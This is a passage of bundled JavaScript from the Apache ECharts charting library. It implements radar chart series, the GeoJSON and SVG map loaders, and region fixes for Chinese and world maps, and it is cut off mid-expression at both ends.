License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar RadarSeries = SeriesModel.extend({\n\n    type: 'series.radar',\n\n    dependencies: ['radar'],\n\n\n    // Overwrite\n    init: function (option) {\n        RadarSeries.superApply(this, 'init', arguments);\n\n        // Enable legend selection for each data item\n        // Use a function instead of direct access because data reference may changed\n        this.legendVisualProvider = new LegendVisualProvider(\n            bind(this.getData, this), bind(this.getRawData, this)\n        );\n\n    },\n\n    getInitialData: function (option, ecModel) {\n        return createListSimply(this, {\n            generateCoord: 'indicator_',\n            generateCoordCount: Infinity\n        });\n    },\n\n    formatTooltip: function (dataIndex) {\n        var data = this.getData();\n        var coordSys = this.coordinateSystem;\n        var indicatorAxes = coordSys.getIndicatorAxes();\n        var name = this.getData().getName(dataIndex);\n        return encodeHTML(name === '' ? this.name : name) + '<br/>'\n            + map(indicatorAxes, function (axis, idx) {\n                var val = data.get(data.mapDimension(axis.dim), dataIndex);\n                return encodeHTML(axis.name + ' : ' + val);\n            }).join('<br />');\n    },\n\n    /**\n     * @implement\n     */\n    getTooltipPosition: function (dataIndex) {\n        if (dataIndex != null) {\n            var data = this.getData();\n            var coordSys = this.coordinateSystem;\n            var values = data.getValues(\n                map(coordSys.dimensions, function (dim) {\n                    return data.mapDimension(dim);\n                }), dataIndex, true\n            );\n\n            for (var i = 0, len = values.length; i < len; i++) {\n                if (!isNaN(values[i])) {\n                    var indicatorAxes = coordSys.getIndicatorAxes();\n                    return coordSys.coordToPoint(indicatorAxes[i].dataToCoord(values[i]), i);\n                }\n            }\n        }\n    },\n\n    defaultOption: {\n        zlevel: 0,\n        z: 2,\n        coordinateSystem: 'radar',\n        legendHoverLink: true,\n        radarIndex: 0,\n        lineStyle: {\n            width: 2,\n            type: 'solid'\n        },\n        label: {\n            position: 'top'\n        },\n        // areaStyle: {\n        // },\n        // itemStyle: {}\n        symbol: 'emptyCircle',\n        symbolSize: 4\n        // symbolRotate: null\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nfunction normalizeSymbolSize(symbolSize) {\n    if (!isArray(symbolSize)) {\n        symbolSize = [+symbolSize, +symbolSize];\n    }\n    return symbolSize;\n}\n\nextendChartView({\n\n    type: 'radar',\n\n    render: function (seriesModel, ecModel, api) {\n        var polar = seriesModel.coordinateSystem;\n        var group = this.group;\n\n        var data = seriesModel.getData();\n        var oldData = this._data;\n\n        function createSymbol$$1(data, idx) {\n            var symbolType = data.getItemVisual(idx, 'symbol') || 'circle';\n            var color = data.getItemVisual(idx, 'color');\n            if (symbolType === 'none') {\n                return;\n            }\n            var symbolSize = normalizeSymbolSize(\n                data.getItemVisual(idx, 'symbolSize')\n            );\n            var symbolPath = createSymbol(\n                symbolType, -1, -1, 2, 2, color\n            );\n            symbolPath.attr({\n                style: {\n                    strokeNoScale: true\n                },\n                z2: 100,\n                scale: [symbolSize[0] / 2, symbolSize[1] / 2]\n            });\n            return symbolPath;\n        }\n\n        function updateSymbols(oldPoints, newPoints, symbolGroup, data, idx, isInit) {\n            // Simply rerender all\n            symbolGroup.removeAll();\n            for (var i = 0; i < newPoints.length - 1; i++) {\n                var symbolPath = createSymbol$$1(data, idx);\n                if (symbolPath) {\n                    symbolPath.__dimIdx = i;\n                    if (oldPoints[i]) {\n                        symbolPath.attr('position', oldPoints[i]);\n                        graphic[isInit ? 'initProps' : 'updateProps'](\n                            symbolPath, {\n                                position: newPoints[i]\n                            }, seriesModel, idx\n                        );\n                    }\n                    else {\n                        symbolPath.attr('position', newPoints[i]);\n                    }\n                    symbolGroup.add(symbolPath);\n                }\n            }\n        }\n\n        function getInitialPoints(points) {\n            return map(points, function (pt) {\n                return [polar.cx, polar.cy];\n            });\n        }\n        data.diff(oldData)\n            .add(function (idx) {\n                var points = data.getItemLayout(idx);\n                if (!points) {\n                    return;\n                }\n                var polygon = new Polygon();\n                var polyline = new Polyline();\n                var target = {\n                    shape: {\n                        points: points\n                    }\n                };\n\n                polygon.shape.points = getInitialPoints(points);\n                polyline.shape.points = getInitialPoints(points);\n                initProps(polygon, target, seriesModel, idx);\n                initProps(polyline, target, seriesModel, idx);\n\n                var itemGroup = new Group();\n                var symbolGroup = new Group();\n                itemGroup.add(polyline);\n                itemGroup.add(polygon);\n                itemGroup.add(symbolGroup);\n\n                updateSymbols(\n                    polyline.shape.points, points, symbolGroup, data, idx, true\n                );\n\n                data.setItemGraphicEl(idx, itemGroup);\n            })\n            .update(function (newIdx, oldIdx) {\n                var itemGroup = oldData.getItemGraphicEl(oldIdx);\n                var polyline = itemGroup.childAt(0);\n                var polygon = itemGroup.childAt(1);\n                var symbolGroup = itemGroup.childAt(2);\n                var target = {\n                    shape: {\n                        points: data.getItemLayout(newIdx)\n                    }\n                };\n\n                if (!target.shape.points) {\n                    return;\n                }\n                updateSymbols(\n                    polyline.shape.points, target.shape.points, symbolGroup, data, newIdx, false\n                );\n\n                updateProps(polyline, target, seriesModel);\n                updateProps(polygon, target, seriesModel);\n\n                data.setItemGraphicEl(newIdx, itemGroup);\n            })\n            .remove(function (idx) {\n                group.remove(oldData.getItemGraphicEl(idx));\n            })\n            .execute();\n\n        data.eachItemGraphicEl(function (itemGroup, idx) {\n            var itemModel = data.getItemModel(idx);\n            var polyline = itemGroup.childAt(0);\n            var polygon = itemGroup.childAt(1);\n            var symbolGroup = itemGroup.childAt(2);\n            var color = data.getItemVisual(idx, 'color');\n\n            group.add(itemGroup);\n\n            polyline.useStyle(\n                defaults(\n                    itemModel.getModel('lineStyle').getLineStyle(),\n                    {\n                        fill: 'none',\n                        stroke: color\n                    }\n                )\n            );\n            polyline.hoverStyle = itemModel.getModel('emphasis.lineStyle').getLineStyle();\n\n            var areaStyleModel = itemModel.getModel('areaStyle');\n            var hoverAreaStyleModel = itemModel.getModel('emphasis.areaStyle');\n            var polygonIgnore = areaStyleModel.isEmpty() && areaStyleModel.parentModel.isEmpty();\n            var hoverPolygonIgnore = hoverAreaStyleModel.isEmpty() && hoverAreaStyleModel.parentModel.isEmpty();\n\n            hoverPolygonIgnore = hoverPolygonIgnore && polygonIgnore;\n            polygon.ignore = polygonIgnore;\n\n            polygon.useStyle(\n                defaults(\n                    areaStyleModel.getAreaStyle(),\n                    {\n                        fill: color,\n                        opacity: 0.7\n                    }\n                )\n            );\n            polygon.hoverStyle = hoverAreaStyleModel.getAreaStyle();\n\n            var itemStyle = itemModel.getModel('itemStyle').getItemStyle(['color']);\n            var itemHoverStyle = itemModel.getModel('emphasis.itemStyle').getItemStyle();\n            var labelModel = itemModel.getModel('label');\n            var labelHoverModel = itemModel.getModel('emphasis.label');\n            symbolGroup.eachChild(function (symbolPath) {\n                symbolPath.setStyle(itemStyle);\n                symbolPath.hoverStyle = clone(itemHoverStyle);\n                var defaultText = data.get(data.dimensions[symbolPath.__dimIdx], idx);\n                (defaultText == null || isNaN(defaultText)) && (defaultText = '');\n\n                setLabelStyle(\n                    symbolPath.style, symbolPath.hoverStyle, labelModel, labelHoverModel,\n                    {\n                        labelFetcher: data.hostModel,\n                        labelDataIndex: idx,\n                        labelDimIndex: symbolPath.__dimIdx,\n                        defaultText: defaultText,\n                        autoColor: color,\n                        isRectText: true\n                    }\n                );\n            });\n\n            itemGroup.highDownOnUpdate = function (fromState, toState) {\n                polygon.attr('ignore', toState === 'emphasis' ? hoverPolygonIgnore : polygonIgnore);\n            };\n            setHoverStyle(itemGroup);\n        });\n\n        this._data = data;\n    },\n\n    remove: function () {\n        this.group.removeAll();\n        this._data = null;\n    },\n\n    dispose: function () {}\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar radarLayout = function (ecModel) {\n    ecModel.eachSeriesByType('radar', function (seriesModel) {\n        var data = seriesModel.getData();\n        var points = [];\n        var coordSys = seriesModel.coordinateSystem;\n        if (!coordSys) {\n            return;\n        }\n\n        var axes = coordSys.getIndicatorAxes();\n\n        each$1(axes, function (axis, axisIndex) {\n            data.each(data.mapDimension(axes[axisIndex].dim), function (val, dataIndex) {\n                points[dataIndex] = points[dataIndex] || [];\n                var point = coordSys.dataToPoint(val, axisIndex);\n                points[dataIndex][axisIndex] = isValidPoint(point)\n                    ? point : getValueMissingPoint(coordSys);\n            });\n        });\n\n        // Close polygon\n        data.each(function (idx) {\n            // TODO\n            // Is it appropriate to connect to the next data when some data is missing?\n            // Or, should trade it like `connectNull` in line chart?\n            var firstPoint = find(points[idx], function (point) {\n                return isValidPoint(point);\n            }) || getValueMissingPoint(coordSys);\n\n            // Copy the first actual point to the end of the array\n            points[idx].push(firstPoint.slice());\n            data.setItemLayout(idx, points[idx]);\n        });\n    });\n};\n\nfunction isValidPoint(point) {\n    return !isNaN(point[0]) && !isNaN(point[1]);\n}\n\nfunction getValueMissingPoint(coordSys) {\n    // It is error-prone to input [NaN, NaN] into polygon, polygon.\n    // (probably cause problem when refreshing or animating)\n    return [coordSys.cx, coordSys.cy];\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// Backward compat for radar chart in 2\nvar backwardCompat$1 = function (option) {\n    var polarOptArr = option.polar;\n    if (polarOptArr) {\n        if (!isArray(polarOptArr)) {\n            polarOptArr = [polarOptArr];\n        }\n        var polarNotRadar = [];\n        each$1(polarOptArr, function (polarOpt, idx) {\n            if (polarOpt.indicator) {\n                if (polarOpt.type && !polarOpt.shape) {\n                    polarOpt.shape = polarOpt.type;\n                }\n                option.radar = option.radar || [];\n                if (!isArray(option.radar)) {\n                    option.radar = [option.radar];\n                }\n                option.radar.push(polarOpt);\n            }\n            else {\n                polarNotRadar.push(polarOpt);\n            }\n        });\n        option.polar = polarNotRadar;\n    }\n    each$1(option.series, function (seriesOpt) {\n        if (seriesOpt && seriesOpt.type === 'radar' && seriesOpt.polarIndex) {\n            seriesOpt.radarIndex = seriesOpt.polarIndex;\n        }\n    });\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n\n// Must use radar component\nregisterVisual(dataColor('radar'));\nregisterVisual(visualSymbol('radar', 'circle'));\nregisterLayout(radarLayout);\nregisterProcessor(dataFilter('radar'));\nregisterPreprocessor(backwardCompat$1);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// Fix for 南海诸岛\n\nvar geoCoord = [126, 25];\n\nvar points$1 = [\n    [[0, 3.5], [7, 11.2], [15, 11.9], [30, 7], [42, 0.7], [52, 0.7],\n        [56, 7.7], [59, 0.7], [64, 0.7], [64, 0], [5, 0], [0, 3.5]],\n    [[13, 16.1], [19, 14.7], [16, 21.7], [11, 23.1], [13, 16.1]],\n    [[12, 32.2], [14, 38.5], [15, 38.5], [13, 32.2], [12, 32.2]],\n    [[16, 47.6], [12, 53.2], [13, 53.2], [18, 47.6], [16, 47.6]],\n    [[6, 64.4], [8, 70], [9, 70], [8, 64.4], [6, 64.4]],\n    [[23, 82.6], [29, 79.8], [30, 79.8], [25, 82.6], [23, 82.6]],\n    [[37, 70.7], [43, 62.3], [44, 62.3], [39, 70.7], [37, 70.7]],\n    [[48, 51.1], [51, 45.5], [53, 45.5], [50, 51.1], [48, 51.1]],\n    [[51, 35], [51, 28.7], [53, 28.7], [53, 35], [51, 35]],\n    [[52, 22.4], [55, 17.5], [56, 17.5], [53, 22.4], [52, 22.4]],\n    [[58, 12.6], [62, 7], [63, 7], [60, 12.6], [58, 12.6]],\n    [[0, 3.5], [0, 93.1], [64, 93.1], [64, 0], [63, 0], [63, 92.4],\n        [1, 92.4], [1, 3.5], [0, 3.5]]\n];\n\nfor (var i$1 = 0; i$1 < points$1.length; i$1++) {\n    for (var k = 0; k < points$1[i$1].length; k++) {\n        points$1[i$1][k][0] /= 10.5;\n        points$1[i$1][k][1] /= -10.5 / 0.75;\n\n        points$1[i$1][k][0] += geoCoord[0];\n        points$1[i$1][k][1] += geoCoord[1];\n    }\n}\n\nvar fixNanhai = function (mapType, regions) {\n    if (mapType === 'china') {\n        regions.push(new Region(\n            '南海诸岛',\n            map(points$1, function (exterior) {\n                return {\n                    type: 'polygon',\n                    exterior: exterior\n                };\n            }), geoCoord\n        ));\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar coordsOffsetMap = {\n    '南海诸岛': [32, 80],\n    // 全国\n    '广东': [0, -10],\n    '香港': [10, 5],\n    '澳门': [-10, 10],\n    //'北京': [-10, 0],\n    '天津': [5, 5]\n};\n\nvar fixTextCoord = function (mapType, region) {\n    if (mapType === 'china') {\n        var coordFix = coordsOffsetMap[region.name];\n        if (coordFix) {\n            var cp = region.center;\n            cp[0] += coordFix[0] / 10.5;\n            cp[1] += -coordFix[1] / (10.5 / 0.75);\n        }\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar geoCoordMap = {\n    'Russia': [100, 60],\n    'United States': [-99, 38],\n    'United States of America': [-99, 38]\n};\n\nvar fixGeoCoord = function (mapType, region) {\n    if (mapType === 'world') {\n        var geoCoord = geoCoordMap[region.name];\n        if (geoCoord) {\n            var cp = region.center;\n            cp[0] = geoCoord[0];\n            cp[1] = geoCoord[1];\n        }\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// Fix for 钓鱼岛\n\n// var Region = require('../Region');\n// var zrUtil = require('zrender/src/core/util');\n\n// var geoCoord = [126, 25];\n\nvar points$2 = [\n    [\n        [123.45165252685547, 25.73527164402261],\n        [123.49731445312499, 25.73527164402261],\n        [123.49731445312499, 25.750734064600884],\n        [123.45165252685547, 25.750734064600884],\n        [123.45165252685547, 25.73527164402261]\n    ]\n];\n\nvar fixDiaoyuIsland = function (mapType, region) {\n    if (mapType === 'china' && region.name === '台湾') {\n        region.geometries.push({\n            type: 'polygon',\n            exterior: points$2[0]\n        });\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// Built-in GEO fixer.\nvar inner$7 = makeInner();\n\nvar geoJSONLoader = {\n\n    /**\n     * @param {string} mapName\n     * @param {Object} mapRecord {specialAreas, geoJSON}\n     * @return {Object} {regions, boundingRect}\n     */\n    load: function (mapName, mapRecord) {\n\n        var parsed = inner$7(mapRecord).parsed;\n\n        if (parsed) {\n            return parsed;\n        }\n\n        var specialAreas = mapRecord.specialAreas || {};\n        var geoJSON = mapRecord.geoJSON;\n        var regions;\n\n        // https://jsperf.com/try-catch-performance-overhead\n        try {\n            regions = geoJSON ? parseGeoJson$1(geoJSON) : [];\n        }\n        catch (e) {\n            throw new Error('Invalid geoJson format\\n' + e.message);\n        }\n\n        fixNanhai(mapName, regions);\n\n        each$1(regions, function (region) {\n            var regionName = region.name;\n\n            fixTextCoord(mapName, region);\n            fixGeoCoord(mapName, region);\n            fixDiaoyuIsland(mapName, region);\n\n            // Some area like Alaska in USA map needs to be tansformed\n            // to look better\n            var specialArea = specialAreas[regionName];\n            if (specialArea) {\n                region.transformTo(\n                    specialArea.left, specialArea.top, specialArea.width, specialArea.height\n                );\n            }\n        });\n\n        return (inner$7(mapRecord).parsed = {\n            regions: regions,\n            boundingRect: getBoundingRect$1(regions)\n        });\n    }\n};\n\nfunction getBoundingRect$1(regions) {\n    var rect;\n    for (var i = 0; i < regions.length; i++) {\n        var regionRect = regions[i].getBoundingRect();\n        rect = rect || regionRect.clone();\n        rect.union(regionRect);\n    }\n    return rect;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar inner$8 = makeInner();\n\nvar geoSVGLoader = {\n\n    /**\n     * @param {string} mapName\n     * @param {Object} mapRecord {specialAreas, geoJSON}\n     * @return {Object} {root, boundingRect}\n     */\n    load: function (mapName, mapRecord) {\n        var originRoot = inner$8(mapRecord).originRoot;\n        if (originRoot) {\n            return {\n                root: originRoot,\n                boundingRect: inner$8(mapRecord).boundingRect\n            };\n        }\n\n        var graphic = buildGraphic(mapRecord);\n\n        inner$8(mapRecord).originRoot = graphic.root;\n        inner$8(mapRecord).boundingRect = graphic.boundingRect;\n\n        return graphic;\n    },\n\n    makeGraphic: function (mapName, mapRecord, hostKey) {\n        // For performance consideration (in large SVG), graphic only maked\n        // when necessary and reuse them according to hostKey.\n        var field = inner$8(mapRecord);\n        var rootMap = field.rootMap || (field.rootMap = createHashMap());\n\n        var root = rootMap.get(hostKey);\n        if (root) {\n            return root;\n        }\n\n        var originRoot = field.originRoot;\n        var boundingRect = field.boundingRect;\n\n        // For performance, if originRoot is not used by a view,\n        // assign it to a view, but not reproduce graphic elements.\n        if (!field.originRootHostKey) {\n            field.originRootHostKey = hostKey;\n            root = originRoot;\n        }\n        else {\n            root = buildGraphic(mapRecord, boundingRect).root;\n        }\n\n        return rootMap.set(hostKey, root);\n    },\n\n    removeGraphic: function (mapName, mapRecord, hostKey) {\n        var field = inner$8(mapRecord);\n        var rootMap = field.rootMap;\n        rootMap && rootMap.removeKey(hostKey);\n        if (hostKey === field.originRootHostKey) {\n            field.originRootHostKey = null;\n        }\n    }\n};\n\nfunction buildGraphic(mapRecord, boundingRect) {\n    var svgXML = mapRecord.svgXML;\n    var result;\n    var root;\n\n    try {\n        result = svgXML && parseSVG(svgXML, {\n            ignoreViewBox: true,\n            ignoreRootClip: true\n        }) || {};\n        root = result.root;\n        assert$1(root != null);\n    }\n    catch (e) {\n        throw new Error('Invalid svg format\\n' + e.message);\n    }\n\n    var svgWidth = result.width;\n    var svgHeight = result.height;\n    var viewBoxRect = result.viewBoxRect;\n\n    if (!boundingRect) {\n        boundingRect = (svgWidth == null || svgHeight == null)\n            // If svg width / height not specified, calculate\n            // bounding rect as the width / height\n            ? root.getBoundingRect()\n            : new BoundingRect(0, 0, 0, 0);\n\n        if (svgWidth != null) {\n            boundingRect.width = svgWidth;\n        }\n        if (svgHeight != null) {\n            boundingRect.height = svgHeight;\n        }\n    }\n\n    if (viewBoxRect) {\n        var viewBoxTransform = makeViewBoxTransform(viewBoxRect, boundingRect.width, boundingRect.height);\n        var elRoot = root;\n        root = new Group();\n        root.add(elRoot);\n        elRoot.scale = viewBoxTransform.scale;\n        elRoot.position = viewBoxTransform.position;\n    }\n\n    root.setClipPath(new Rect({\n        shape: boundingRect.plain()\n    }));\n\n    return {\n        root: root,\n        boundingRect: boundingRect\n    };\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar loaders = {\n    geoJSON: geoJSONLoader,\n    svg: geoSVGLoader\n};\n\nvar geoSourceManager = {\n\n    /**\n     * @param {string} mapName\n     * @param {Object} nameMap\n     * @return {Object} source {regions, regionsMap, nameCoordMap, boundingRect}\n     */\n    load: function (mapName, nameMap) {\n        var regions = [];\n        var regionsMap = createHashMap();\n        var nameCoordMap = createHashMap();\n        var boundingRect;\n        var mapRecords = retrieveMap(mapName);\n\n        each$1(mapRecords, function (record) {\n            var singleSource = loaders[record.type].load(mapName, record);\n\n            each$1(singleSource.regions, function (region) {\n                var regionName = region.name;\n\n                // Try use the alias in geoNameMap\n                if (nameMap && nameMap.hasOwnProperty(regionName)) {\n                    region = region.cloneShallow(regionName = nameMap[regionName]);\n                }\n\n                regions.push(region);\n                regionsMap.set(regionName, region);\n                nameCoordMap.set(regionName, region.center);\n            });\n\n            var rect = singleSource.boundingRect;\n            if (rect) {\n                boundingRect\n                    ? boundingRect.union(rect)\n                    : (boundingRect = rect.clone());\n            }\n        });\n\n        return {\n            regions: regions,\n            regionsMap: regionsMap,\n            nameCoordMap: nameCoordMap,\n            // FIXME Always return new ?\n            boundingRect: boundingRect || new BoundingRect(0, 0, 0, 0)\n        };\n    },\n\n    /**\n     * @param {string} mapName\n     * @param {string} hostKey For cache.\n     * @return {Array.<module:zrender/Element>} Roots.\n     */\n    makeGraphic: makeInvoker('makeGraphic'),\n\n    /**\n     * @param {string} mapName\n     * @param {string} hostKey For cache.\n     */\n    removeGraphic: makeInvoker('removeGraphic')\n};\n\nfunction makeInvoker(methodName) {\n    return function (mapName, hostKey) {\n        var mapRecords = retrieveMap(mapName);\n        var results = [];\n\n        each$1(mapRecords, function (record) {\n            var method = loaders[record.type][methodName];\n            method && results.push(method(mapName, record, hostKey));\n        });\n\n        return results;\n    };\n}\n\nfunction mapNotExistsError(mapName) {\n    if (__DEV__) {\n        console.error(\n            'Map ' + mapName + ' not exists. The GeoJSON of the map must be provided.'\n        );\n    }\n}\n\nfunction retrieveMap(mapName) {\n    var mapRecords = mapDataStorage.retrieveMap(mapName) || [];\n\n    if (__DEV__) {\n        if (!mapRecords.length) {\n            mapNotExistsError(mapName);\n        }\n    }\n\n    return mapRecords;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar MapSeries = SeriesModel.extend({\n\n    type: 'series.map',\n\n    dependencies: ['geo'],\n\n    layoutMode: 'box',\n\n    /**\n     * Only first map series of same mapType will drawMap\n     * @type {boolean}\n     */\n    needsDrawMap: false,\n\n    /**\n     * Group of all map series with same mapType\n     * @type {boolean}\n     */\n    seriesGroup: [],\n\n    getInitialData: function (option) {\n        var data = createListSimply(this, {\n            coordDimensions: ['value'],\n            encodeDefaulter: curry(makeSeriesEncodeForNameBased, this)\n        });\n        var valueDim = data.mapDimension('value');\n        var dataNameMap = createHashMap();\n        var selectTargetList = [];\n        var toAppendNames = [];\n\n        for (var i = 0, len = data.count(); i < len; i++) {\n            var name = data.getName(i);\n            dataNameMap.set(name, true);\n            selectTargetList.push({\n                name: name,\n                value: data.get(valueDim, i),\n                selected: retrieveRawAttr(data, i, 'selected')\n            });\n        }\n\n        var geoSource = geoSourceManager.load(this.getMapType(), this.option.nameMap);\n        each$1(geoSource.regions, function (region) {\n            var name = region.name;\n            if (!dataNameMap.get(name)) {\n                selectTargetList.push({name: name});\n                toAppendNames.push(name);\n            }\n        });\n\n        this.updateSelectedMap(selectTargetList);\n\n        // Complete data with missing regions. The consequent processes (like visual\n        // map and render) can not be performed without a \"full data\". For example,\n        // find `dataIndex` by name.\n        data.appendValues([], toAppendNames);\n\n        return data;\n    },\n\n    /**\n     * If no host geo model, return null, which means using a\n     * inner exclusive geo model.\n     */\n    getHostGeoModel: function () {\n        var geoIndex = this.option.geoIndex;\n        return geoIndex != null\n            ? this.dependentModels.geo[geoIndex]\n            : null;\n    },\n\n    getMapType: function () {\n        return (this.getHostGeoModel() || 